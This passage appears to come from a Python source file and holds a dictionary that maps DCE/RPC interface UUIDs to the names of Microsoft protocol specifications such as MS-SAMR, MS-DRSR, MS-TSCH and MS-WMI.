Software Target Management Protocol',\n'DD6F0A28-248F-4DD3-AFE9-71AED8F685C4':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'52BA97E7-9364-4134-B9CB-F8415213BDD8':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'E2842C88-07C3-4EB0-B1A9-D3D95E76FEF2':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'312CC019-D5CD-4CA7-8C10-9E0A661F147E':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'345B026B-5802-4E38-AC75-795E08B0B83F':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'442931D5-E522-4E64-A181-74E98A4E1748':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'1B1C4D1C-ABC4-4D3A-8C22-547FBA3AA8A0':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'56E65EA5-CDFF-4391-BA76-006E42C2D746':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'E645744B-CAE5-4712-ACAF-13057F7195AF':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'FE7F99F9-1DFB-4AFB-9D00-6A8DD0AABF2C':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'81FE3594-2495-4C91-95BB-EB5785614EC7':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'F093FE3D-8131-4B73-A742-EF54C20B337B':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'28BC8D5E-CA4B-4F54-973C-ED9622D2B3AC':'[MS-ISTM]: iSCSI Software Target Management Protocol',\n'22E5386D-8B12-4BF0-B0EC-6A1EA419E366':'[MS-LREC]: Live Remote Event Capture (LREC) Protocol',\n'12345778-1234-ABCD-EF00-0123456789AB':'[MS-LSAD]: Local Security Authority (Domain Policy) Remote Protocol',\n'12345778-1234-ABCD-EF00-0123456789AB':'[MS-LSAT]: Local Security Authority (Translation Methods) Remote',\n'708CCA10-9569-11D1-B2A5-0060977D8118':'[MS-MQDS]: Message Queuing (MSMQ):',\n'77DF7A80-F298-11D0-8358-00A024C480A8':'[MS-MQDS]: Message Queuing (MSMQ):',\n'76D12B80-3467-11D3-91FF-0090272F9EA3':'[MS-MQMP]: Message Queuing (MSMQ):',\n'FDB3A030-065F-11D1-BB9B-00A024EA5525':'[MS-MQMP]: Message Queuing (MSMQ):',\n'41208EE0-E970-11D1-9B9E-00E02C064C39':'[MS-MQMR]: Message Queuing (MSMQ):',\n'1088A980-EAE5-11D0-8D9B-00A02453C337':'[MS-MQQP]: Message Queuing (MSMQ):',\n'1A9134DD-7B39-45BA-AD88-44D01CA47F28':'[MS-MQRR]: Message Queuing (MSMQ):',\n'17FDD703-1827-4E34-79D4-24A55C53BB37':'[MS-MSRP]: Messenger Service Remote Protocol',\n'12345678-1234-ABCD-EF00-01234567CFFB':'[MS-NRPC]: Netlogon Remote Protocol',\n'00020411-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol',\n'00020401-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol',\n'00020403-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol',\n'00020412-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol',\n'00020402-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol',\n'00020400-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol',\n'00020404-0000-0000-C000-000000000046':'[MS-OAUT]: OLE Automation Protocol',\n'784B693D-95F3-420B-8126-365C098659F2':'[MS-OCSPA]: Microsoft OCSP Administration Protocol',\n'AE33069B-A2A8-46EE-A235-DDFD339BE281':'[MS-PAN]: Print System Asynchronous Notification Protocol',\n'0B6EDBFA-4A24-4FC6-8A23-942B1ECA65D1':'[MS-PAN]: Print System Asynchronous Notification Protocol',\n'76F03F96-CDFD-44FC-A22C-64950A001209':'[MS-PAR]: Print System Asynchronous Remote Protocol',\n'DA5A86C5-12C2-4943-AB30-7F74A813D853':'[MS-PCQ]: Performance Counter Query Protocol',\n'03837510-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'03837543-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'03837533-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'03837541-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'03837544-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'03837524-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'0383753A-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'03837534-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'0383750B-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'0383751A-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'03837512-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'0383753D-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'03837506-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'03837520-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'038374FF-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'03837514-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'03837502-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'03837516-098B-11D8-9414-505054503030':'[MS-PLA]: Performance Logs and Alerts Protocol',\n'0B1C2170-5732-4E0E-8CD3-D9B16F3B84D7':'[MS-RAA]: Remote Authorization API Protocol',\n'F120A684-B926-447F-9DF4-C966CB785648':'[MS-RAI]: Remote Assistance Initiation Protocol',\n'833E4010-AFF7-4AC3-AAC2-9F24C1457BCE':'[MS-RAI]: Remote Assistance Initiation Protocol',\n'833E4200-AFF7-4AC3-AAC2-9F24C1457BCE':'[MS-RAI]: Remote Assistance Initiation Protocol',\n'3C3A70A7-A468-49B9-8ADA-28E11FCCAD5D':'[MS-RAI]: Remote Assistance Initiation Protocol',\n'833E4100-AFF7-4AC3-AAC2-9F24C1457BCE':'[MS-RAI]: Remote Assistance Initiation Protocol',\n'833E41AA-AFF7-4AC3-AAC2-9F24C1457BCE':'[MS-RAI]: Remote Assistance Initiation Protocol',\n'C323BE28-E546-4C23-A81B-D6AD8D8FAC7B':'[MS-RAINPS]: Remote Administrative Interface:',\n'83E05BD5-AEC1-4E58-AE50-E819C7296F67':'[MS-RAINPS]: Remote Administrative Interface:',\n'45F52C28-7F9F-101A-B52B-08002B2EFABE':'[MS-RAIW]: Remote Administrative Interface:',\n'811109BF-A4E1-11D1-AB54-00A0C91E9B45':'[MS-RAIW]: Remote Administrative Interface:',\n'A35AF600-9CF4-11CD-A076-08002B2BD711':'[MS-RDPESC]: Remote Desktop Protocol:',\n'12345678-1234-ABCD-EF00-0123456789AB':'[MS-RPRN]: Print System Remote Protocol',\n'66A2DB21-D706-11D0-A37B-00C04FC9DA04':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',\n'66A2DB1B-D706-11D0-A37B-00C04FC9DA04':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',\n'66A2DB20-D706-11D0-A37B-00C04FC9DA04':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',\n'66A2DB22-D706-11D0-A37B-00C04FC9DA04':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',\n'8F09F000-B7ED-11CE-BBD2-00001A181CAD':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',\n'5FF9BDF6-BD91-4D8B-A614-D6317ACC8DD8':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',\n'20610036-FA22-11CF-9823-00A0C911E5DF':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',\n'67E08FC2-2984-4B62-B92E-FC1AAE64BBBB':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',\n'6139D8A4-E508-4EBB-BAC7-D7F275145897':'[MS-RRASM]: Routing and Remote Access Server (RRAS) Management',\n'338CD001-2244-31F1-AAAA-900038001003':'[MS-RRP]: Windows Remote Registry Protocol',\n'3BBED8D9-2C9A-4B21-8936-ACB2F995BE6C':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',\n'8DA03F40-3419-11D1-8FB1-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',\n'D61A27C6-8F53-11D0-BFA0-00A024151983':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',\n'081E7188-C080-4FF3-9238-29F66D6CABFD':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',\n'895A2C86-270D-489D-A6C0-DC2A9B35280E':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',\n'D02E4BE0-3419-11D1-8FB1-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',\n'DB90832F-6910-4D46-9F5E-9FD6BFA73903':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',\n'4E934F30-341A-11D1-8FB1-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',\n'879C8BBE-41B0-11D1-BE11-00C04FB6BF70':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',\n'00000000-0000-0000-C000-000000000046':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',\n'69AB7050-3059-11D1-8FAF-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',\n'7D07F313-A53F-459A-BB12-012C15B1846E':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',\n'BB39332C-BFEE-4380-AD8A-BADC8AFF5BB6':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',\n'B057DC50-3059-11D1-8FAF-00A024CB6019':'[MS-RSMP]: Removable Storage Manager (RSM) Remote Protocol',\n'894DE0C0-0D55-11D3-A322-00C04FA321A1':'[MS-RSP]: Remote Shutdown Protocol',\n'D95AFE70-A6D5-4259-822E-2C84DA1DDB0D':'[MS-RSP]: Remote Shutdown Protocol',\n'12345778-1234-ABCD-EF00-0123456789AC':'[MS-SAMR]: Security Account Manager (SAM) Remote Protocol',\n'01954E6B-9254-4E6E-808C-C9E05D007696':'[MS-SCMP]: Shadow Copy Management Protocol',\n'FA7DF749-66E7-4986-A27F-E2F04AE53772':'[MS-SCMP]: Shadow Copy Management Protocol',\n'214A0F28-B737-4026-B847-4F9E37D79529':'[MS-SCMP]: Shadow Copy Management Protocol',\n'AE1C7110-2F60-11D3-8A39-00C04F72D8E3':'[MS-SCMP]: Shadow Copy Management Protocol',\n'367ABB81-9844-35F1-AD32-98F038001003':'[MS-SCMR]: Service Control Manager Remote Protocol',\n'4B324FC8-1670-01D3-1278-5A47BF6EE188':'[MS-SRVS]: Server Service Remote Protocol',\n'CCD8C074-D0E5-4A40-92B4-D074FAA6BA28':'[MS-SWN]: Service Witness Protocol',\n'1A1BB35F-ABB8-451C-A1AE-33D98F1BEF4A':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card',\n'1C60A923-2D86-46AA-928A-E7F3E37577AF':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card',\n'FDF8A2B9-02DE-47F4-BC26-AA85AB5E5267':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card',\n'112B1DFF-D9DC-41F7-869F-D67FEE7CB591':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card',\n'152EA2A8-70DC-4C59-8B2A-32AA3CA0DCAC':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card',\n'16A18E86-7F6E-4C20-AD89-4FFC0DB7A96A':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card',\n'3C745A97-F375-4150-BE17-5950F694C699':'[MS-TPMVSC]: Trusted Platform Module (TPM) Virtual Smart Card',\n'2F5F6521-CA47-1068-B319-00DD010662DB':'[MS-TRP]: Telephony Remote Protocol',\n'2F5F6520-CA46-1067-B319-00DD010662DA':'[MS-TRP]: Telephony Remote Protocol',\n'1FF70682-0A51-30E8-076D-740BE8CEE98B':'[MS-TSCH]: Task Scheduler Service Remoting Protocol',\n'378E52B0-C0A9-11CF-822D-00AA0051E40F':'[MS-TSCH]: Task Scheduler Service Remoting Protocol',\n'86D35949-83C9-4044-B424-DB363231FD0C':'[MS-TSCH]: Task Scheduler Service Remoting Protocol',\n'44E265DD-7DAF-42CD-8560-3CDB6E7A2729':'[MS-TSGU]: Terminal Services Gateway Server Protocol',\n'034634FD-BA3F-11D1-856A-00A0C944138C':'[MS-TSRAP]: Telnet Server Remote Administration Protocol',\n'497D95A6-2D27-4BF5-9BBD-A6046957133C':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',\n'11899A43-2B68-4A76-92E3-A3D6AD8C26CE':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',\n'5CA4A760-EBB1-11CF-8611-00A0245420ED':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',\n'BDE95FDF-EEE0-45DE-9E12-E5A61CD0D4FE':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',\n'484809D6-4239-471B-B5BC-61DF8C23AC48':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',\n'88143FD0-C28D-4B2B-8FEF-8D882F6A9390':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',\n'1257B580-CE2F-4109-82D6-A9459D0BF6BC':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',\n'53B46B02-C73B-4A3E-8DEE-B16B80672FC0':'[MS-TSTS]: Terminal Services Terminal Server Runtime Interface',\n'DDE02280-12B3-4E0B-937B-6747F6ACB286':'[MS-UAMG]: Update Agent Management Protocol',\n'112EDA6B-95B3-476F-9D90-AEE82C6B8181':'[MS-UAMG]: Update Agent Management Protocol',\n'144FE9B0-D23D-4A8B-8634-FB4457533B7A':'[MS-UAMG]: Update Agent Management Protocol',\n'70CF5C82-8642-42BB-9DBC-0CFD263C6C4F':'[MS-UAMG]: Update Agent Management Protocol',\n'49EBD502-4A96-41BD-9E3E-4C5057F4250C':'[MS-UAMG]: Update Agent Management Protocol',\n'7C907864-346C-4AEB-8F3F-57DA289F969F':'[MS-UAMG]: Update Agent Management Protocol',\n'46297823-9940-4C09-AED9-CD3EA6D05968':'[MS-UAMG]: Update Agent Management Protocol',\n'4CBDCB2D-1589-4BEB-BD1C-3E582FF0ADD0':'[MS-UAMG]: Update Agent Management Protocol',\n'8F45ABF1-F9AE-4B95-A933-F0F66E5056EA':'[MS-UAMG]: Update Agent Management Protocol',\n'6A92B07A-D821-4682-B423-5C805022CC4D':'[MS-UAMG]: Update Agent Management Protocol',\n'54A2CB2D-9A0C-48B6-8A50-9ABB69EE2D02':'[MS-UAMG]: Update Agent Management Protocol',\n'0D521700-A372-4BEF-828B-3D00C10ADEBD':'[MS-UAMG]: Update Agent Management Protocol',\n'C2BFB780-4539-4132-AB8C-0A8772013AB6':'[MS-UAMG]: Update Agent Management Protocol',\n'1518B460-6518-4172-940F-C75883B24CEB':'[MS-UAMG]: Update Agent Management Protocol',\n'81DDC1B8-9D35-47A6-B471-5B80F519223B':'[MS-UAMG]: Update Agent Management Protocol',\n'BC5513C8-B3B8-4BF7-A4D4-361C0D8C88BA':'[MS-UAMG]: Update Agent Management Protocol',\n'C1C2F21A-D2F4-4902-B5C6-8A081C19A890':'[MS-UAMG]: Update Agent Management Protocol',\n'07F7438C-7709-4CA5-B518-91279288134E':'[MS-UAMG]: Update Agent Management Protocol',\n'C97AD11B-F257-420B-9D9F-377F733F6F68':'[MS-UAMG]: Update Agent Management Protocol',\n'3A56BFB8-576C-43F7-9335-FE4838FD7E37':'[MS-UAMG]: Update Agent Management Protocol',\n'615C4269-7A48-43BD-96B7-BF6CA27D6C3E':'[MS-UAMG]: Update Agent Management Protocol',\n'004C6A2B-0C19-4C69-9F5C-A269B2560DB9':'[MS-UAMG]: Update Agent Management Protocol',\n'7366EA16-7A1A-4EA2-B042-973D3E9CD99B':'[MS-UAMG]: Update Agent Management Protocol',\n'A376DD5E-09D4-427F-AF7C-FED5B6E1C1D6':'[MS-UAMG]: Update Agent Management Protocol',\n'23857E3C-02BA-44A3-9423-B1C900805F37':'[MS-UAMG]: Update Agent Management Protocol',\n'B383CD1A-5CE9-4504-9F63-764B1236F191':'[MS-UAMG]: Update Agent Management Protocol',\n'76B3B17E-AED6-4DA5-85F0-83587F81ABE3':'[MS-UAMG]: Update Agent Management Protocol',\n'0BB8531D-7E8D-424F-986C-A0B8F60A3E7B':'[MS-UAMG]: Update Agent Management Protocol',\n'91CAF7B0-EB23-49ED-9937-C52D817F46F7':'[MS-UAMG]: Update Agent Management Protocol',\n'673425BF-C082-4C7C-BDFD-569464B8E0CE':'[MS-UAMG]: Update Agent Management Protocol',\n'EFF90582-2DDC-480F-A06D-60F3FBC362C3':'[MS-UAMG]: Update Agent Management Protocol',\n'D9A59339-E245-4DBD-9686-4D5763E39624':'[MS-UAMG]: Update Agent Management Protocol',\n'9B0353AA-0E52-44FF-B8B0-1F7FA0437F88':'[MS-UAMG]: Update Agent Management Protocol',\n'503626A3-8E14-4729-9355-0FE664BD2321':'[MS-UAMG]: Update Agent Management Protocol',\n'85713FA1-7796-4FA2-BE3B-E2D6124DD373':'[MS-UAMG]: Update Agent Management Protocol',\n'816858A4-260D-4260-933A-2585F1ABC76B':'[MS-UAMG]: Update Agent Management Protocol',\n'27E94B0D-5139-49A2-9A61-93522DC54652':'[MS-UAMG]: Update Agent Management Protocol',\n'E7A4D634-7942-4DD9-A111-82228BA33901':'[MS-UAMG]: Update Agent Management Protocol',\n'D40CFF62-E08C-4498-941A-01E25F0FD33C':'[MS-UAMG]: Update Agent Management Protocol',\n'ED8BFE40-A60B-42EA-9652-817DFCFA23EC':'[MS-UAMG]: Update Agent Management Protocol',\n'A7F04F3C-A290-435B-AADF-A116C3357A5C':'[MS-UAMG]: Update Agent Management Protocol',\n'4A2F5C31-CFD9-410E-B7FB-29A653973A0F':'[MS-UAMG]: Update Agent Management Protocol',\n'BE56A644-AF0E-4E0E-A311-C1D8E695CBFF':'[MS-UAMG]: Update Agent Management Protocol',\n'918EFD1E-B5D8-4C90-8540-AEB9BDC56F9D':'[MS-UAMG]: Update Agent Management Protocol',\n'04C6895D-EAF2-4034-97F3-311DE9BE413A':'[MS-UAMG]: Update Agent Management Protocol',\n'15FC031C-0652-4306-B2C3-F558B8F837E2':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'4DBCEE9A-6343-4651-B85F-5E75D74D983C':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'1E062B84-E5E6-4B4B-8A25-67B81E8F13E8':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'2ABD757F-2851-4997-9A13-47D2A885D6CA':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'9CBE50CA-F2D2-4BF4-ACE1-96896B729625':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'4DAA0135-E1D1-40F1-AAA5-3CC1E53221C3':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'3858C0D5-0F35-4BF5-9714-69874963BC36':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'40F73C8B-687D-4A13-8D96-3D7F2E683936':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'8F4B2F5D-EC15-4357-992F-473EF10975B9':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'FC5D23E8-A88B-41A5-8DE0-2D2F73C5A630':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'B07FEDD4-1682-4440-9189-A39B55194DC5':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'72AE6713-DCBB-4A03-B36B-371F6AC6B53D':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'B6B22DA8-F903-4BE7-B492-C09D875AC9DA':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'538684E0-BA3D-4BC0-ACA9-164AFF85C2A9':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'75C8F324-F715-4FE3-A28E-F9011B61A4A1':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'90681B1D-6A7F-48E8-9061-31B7AA125322':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'9882F547-CFC3-420B-9750-00DFBEC50662':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'83BFB87F-43FB-4903-BAA6-127F01029EEC':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'EE2D5DED-6236-4169-931D-B9778CE03DC6':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'9723F420-9355-42DE-AB66-E31BB15BEEAC':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'4AFC3636-DB01-4052-80C3-03BBCB8D3C69':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'D99BDAAE-B13A-4178-9FDB-E27F16B4603E':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'D68168C9-82A2-4F85-B6E9-74707C49A58F':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'13B50BFF-290A-47DD-8558-B7C58DB1A71A':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'6E6F6B40-977C-4069-BDDD-AC710059F8C0':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'9AA58360-CE33-4F92-B658-ED24B14425B8':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'E0393303-90D4-4A97-AB71-E9B671EE2729':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'07E5C822-F00C-47A1-8FCE-B244DA56FD06':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'8326CD1D-CF59-4936-B786-5EFC08798E25':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'1BE2275A-B315-4F70-9E44-879B3A2A53F2':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'0316560B-5DB4-4ED9-BBB5-213436DDC0D9':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'14FBE036-3ED7-4E10-90E9-A5FF991AFF01':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'3B69D7F5-9D94-4648-91CA-79939BA263BF':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'D5D23B6D-5A55-4492-9889-397A3C2D2DBC':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'88306BB2-E71F-478C-86A2-79DA200A0F11':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'118610B7-8D94-4030-B5B8-500889788E4E':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'0AC13689-3134-47C6-A17C-4669216801BE':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'0818A8EF-9BA9-40D8-A6F9-E22833CC771E':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'6788FAF9-214E-4B85-BA59-266953616E09':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'B481498C-8354-45F9-84A0-0BDD2832A91F':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'10C5E575-7984-4E81-A56B-431F5F92AE42':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'38A0A9AB-7CC8-4693-AC07-1F28BD03C3DA':'[MS-VDS]: Virtual Disk Service (VDS) Protocol',\n'8FB6D884-2388-11D0-8C35-00C04FDA2795':'[MS-W32T]: W32Time Remote Protocol',\n'5422FD3A-D4B8-4CEF-A12E-E87D4CA22E90':'[MS-WCCE]: Windows Client Certificate Enrollment Protocol',\n'D99E6E70-FC88-11D0-B498-00A0C90312F3':'[MS-WCCE]: Windows Client Certificate Enrollment Protocol',\n'1A927394-352E-4553-AE3F-7CF4AAFCA620':'[MS-WDSC]: Windows Deployment Services Control Protocol',\n'6BFFD098-A112-3610-9833-46C3F87E345A':'[MS-WKST]: Workstation Service Remote Protocol',\n'F1E9C5B2-F59B-11D2-B362-00105A1F8177':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'423EC01E-2E35-11D2-B604-00104B703EFD':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'9556DC99-828C-11CF-A37E-00AA003240C7':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'F309AD18-D86A-11D0-A075-00C04FB68820':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'9A653086-174F-11D2-B5F9-00104B703EFD':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'D4781CD6-E5D3-44DF-AD94-930EFE48A887':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'44ACA674-E8FC-11D0-A07C-00C04FB68820':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'541679AB-2E5F-11D3-B34E-00104BCC4B4A':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'027947E1-D731-11CE-A357-000000000001':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'A359DEC5-E813-4834-8A2A-BA7F1D777D76':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'C49E32C6-BC8B-11D2-85D4-00105A1F8304':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'C49E32C7-BC8B-11D2-85D4-00105A1F8304':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'2C9273E0-1DC3-11D3-B364-00105A1F8177':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'7C857801-7381-11CF-884D-00AA004B2E24':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'DC12A681-737F-11CF-884D-00AA004B2E24':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'8BC3F05E-D86B-11D0-A075-00C04FB68820':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'44ACA675-E8FC-11D0-A07C-00C04FB68820':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'1C1C45EE-4395-11D2-B60B-00104B703EFD':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'674B6698-EE92-11D0-AD71-00C04FD8FDFF':'[MS-WMI]: Windows Management Instrumentation Remote Protocol',\n'FC910418-55CA-45EF-B264-83D4CE7D30E0':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',\n'C5CEBEE2-9DF5-4CDD-A08C-C2471BC144B4':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',\n'F31931A9-832D-481C-9503-887A0E6A79F0':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',\n'21546AE8-4DA5-445E-987F-627FEA39C5E8':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',\n'BC681469-9DD9-4BF4-9B3D-709F69EFE431':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',\n'4F7CA01C-A9E5-45B6-B142-2332A1339C1D':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',\n'2A3EB639-D134-422D-90D8-AAA1B5216202':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',\n'59602EB6-57B0-4FD8-AA4B-EBF06971FE15':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',\n'481E06CF-AB04-4498-8FFE-124A0A34296D':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',\n'E8BCFFAC-B864-4574-B2E8-F1FB21DFDC18':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',\n'943991A5-B3FE-41FA-9696-7F7B656EE34B':'[MS-WSRM]: Windows System Resource Manager (WSRM) Protocol',\n'BBA9CB76-EB0C-462C-AA1B-5D8C34415701':'[MS-ADTS]: Active Directory Technical Specification',\n'906B0CE0-C70B-1067-B317-00DD010662DA':'[MS-CMPO]: MSDTC Connection Manager:',\n'E3514235-4B06-11D1-AB04-00C04FC2DCD2':'[MS-DRSR]: Directory Replication Service (DRS) Remote Protocol',\n'F6BEAFF7-1E19-4FBB-9F8F-B89E2018337C':'[MS-EVEN6]: EventLog Remoting Protocol',\n'D049B186-814F-11D1-9A3C-00C04FC9B232':'[MS-FRS1]: File Replication Service Protocol',\n'F5CC59B4-4264-101A-8C59-08002B2F8426':'[MS-FRS1]: File Replication Service Protocol',\n'5A7B91F8-FF00-11D0-A9B2-00C04FB6E6FC':'[MS-MSRP]: Messenger Service Remote Protocol',\n'F5CC5A18-4264-101A-8C59-08002B2F8426':'[MS-NSPI]: Name Service Provider Interface (NSPI) Protocol',\n'E33C0CC4-0482-101A-BC0C-02608C6BA218':'[MS-RPCL]: Remote Procedure Call Location Services Extensions',\n'AFA8BD80-7D8A-11C9-BEF4-08002B102989':'[MS-RPCE]: Remote Management Interface',\n'00000134-0000-0000-C000-000000000046':'[MS-DCOM]: Distributed Component Object Model (DCOM)',\n'18F70770-8E64-11CF-9AF1-0020AF6E72F4':'[MS-DCOM]: Distributed Component Object Model (DCOM)',\n'958F92D8-DA20-467A-BBE3-65E7E9B4EDCF':'[MS-TSGU]: Terminal Services Gateway Server Management Interface',\n'6050B110-CE87-4126-A114-50AEFCFC95F8':'[MS-DCOM]: Distributed Component Object Model (DCOM)',\n'1544F5E0-613C-11D1-93DF-00C04FD7BD09':'[MS-OXABREF]: Address Book Name Service Provider Interface (NSPI) Referral Protocol',\n'A4F1DB00-CA47-1067-B31F-00DD010662DA':'[MS-OXCRPC]: Wire Format Protocol',\n'5261574A-4572-206E-B268-6B199213B4E4':'[MS-OXCRPC]: Wire Format Protocol',\n}\n\n# Inquire 